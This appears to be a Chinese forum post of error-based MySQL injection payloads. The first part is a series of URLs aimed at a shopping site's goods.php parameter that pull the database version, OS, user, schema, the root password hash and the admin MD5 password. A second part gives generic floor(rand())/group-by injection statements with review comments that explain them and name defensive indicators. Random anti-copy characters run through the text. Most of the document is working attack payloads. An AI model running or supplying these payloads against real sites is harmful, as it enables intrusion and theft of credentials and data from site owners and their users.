判断版本号
' f8 f% i: G+ N6 X S7 ohttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23" x" g1 L6 I7 V+ x
判断系统
6 I8 R0 M; J7 \. n7 I9 C* k |3 M5 }" W; _; H
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%235 d( M+ c v8 r$ M: N
: k% S8 M! j" g2 r+ p1 i: P* N" x1 H5 }
4 L& X, S+ D8 I+ V K, o( X1 ^ U$ ]% d
当前 user()
& a' W2 `" r+ G- k, @7 C1 Nhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23: G, Y F' l3 g7 [" F* W; \& v
! p1 o' X9 x* L: v7 M/ ]5 V$ D2 Y
( O! L6 ]. @4 q7 z
当前 database()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23, |2 }/ Y- g$ ^" r+ `
/ D, j3 V2 @/ t; {. i% F
; F3 e+ k' T$ y% h# g2 q+ I. b- k! P1 u
0 e! S& @$ ~8 ^$ ~/ Q v
root hash
0 ]; ?4 {' V- c$ Ghttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
( d; e' a' O% F( D, r2 {
+ X7 c+ \( n( M0 \+ w2 L- n! C
7 N8 M, f- Q6 _9 a5 `3 \9 W
当前 数据库表名
$ Q! O2 W8 V" H& K5 A" [ h" w) I+ S0 M3 b2 U6 @- x8 P! h
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23' y/ S5 w7 t8 {5 n% [
: [. R3 ~, r. S B1 I
/ b+ g j& v7 p0 L! _
当前 数据库 user_name 字段
2 M9 U, s! Y+ D$ R
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23% G X4 C" U1 h# O9 x8 j
当前 数据库 字段 password
- C1 a/ d# \ L: ?$ ohttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23* V+ }- z3 b7 T$ w+ ?
) |- B' K/ _" J' f% D1 W
, D* {" J) J% f, P& A8 m9 h
获得 admin passwd(md5)
7 ], O+ H+ N/ F" K& x8 @$ s, B
! f% W( A/ u* S0 u! v# j
' `3 {/ J5 ~" Ahttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
; T* l! {$ s, f& a0 l
报错注射
-- NOTE(review): the statements below are error-based SQL injection payloads recorded
-- from an attack, not application queries. The leading run of punctuation/letters on
-- each line is forum anti-copy noise, not SQL; the SQL begins at `SELECT` / `and(`.
-- Each payload forces a server-side error whose message carries the value selected
-- in the inner subquery. Defensive reading: the injection point is the `uid = -1`
-- literal, so binding `uid` as a query parameter removes the vector, and not
-- returning raw database error text to the client removes the exfiltration channel.
-- The `information_schema` reads combined with the `floor(rand(0)*2) ... group by x`
-- shape are the indicators a WAF or database audit rule should alert on.
-- Leaked value: the server version string.
4 j/ L; G* b! N5 n$ z- MSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
1 u( o V( W: |# i1 i( S7 G
-- Leaked value: the first `username` row of `admin_table` (LIMIT 0,1).
. J. t2 k1 K9 e# O8 C/ N8 NSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)% G6 N6 \! e- ?4 M
-- Leaked value: the 22nd schema name from information_schema.SCHEMATA (LIMIT 21,1),
-- wrapped in ~'...'~ (0x7e,0x27) so it is easy to pick out of the error text.
-- This line is only the `and(...)` tail appended to an existing WHERE clause, not a
-- complete statement; the trailing ` |` is paste residue.
, F& U0 N4 C! m7 ^and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) |